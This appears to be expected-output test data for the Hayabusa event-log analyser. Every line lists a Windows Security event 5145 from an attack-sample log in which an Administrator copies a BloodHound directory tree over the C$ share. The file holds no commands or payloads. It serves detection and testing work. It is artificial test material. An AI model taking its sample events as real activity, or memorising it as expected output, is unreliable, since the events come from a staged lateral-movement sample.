+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\locales | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors\DebugBuilds | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\regenerator | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\css | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\less | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\scss | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\sprites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\svgs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\webfonts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\.nyc_output | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\asap | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\internal | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\array | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\error | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\json | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\math | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
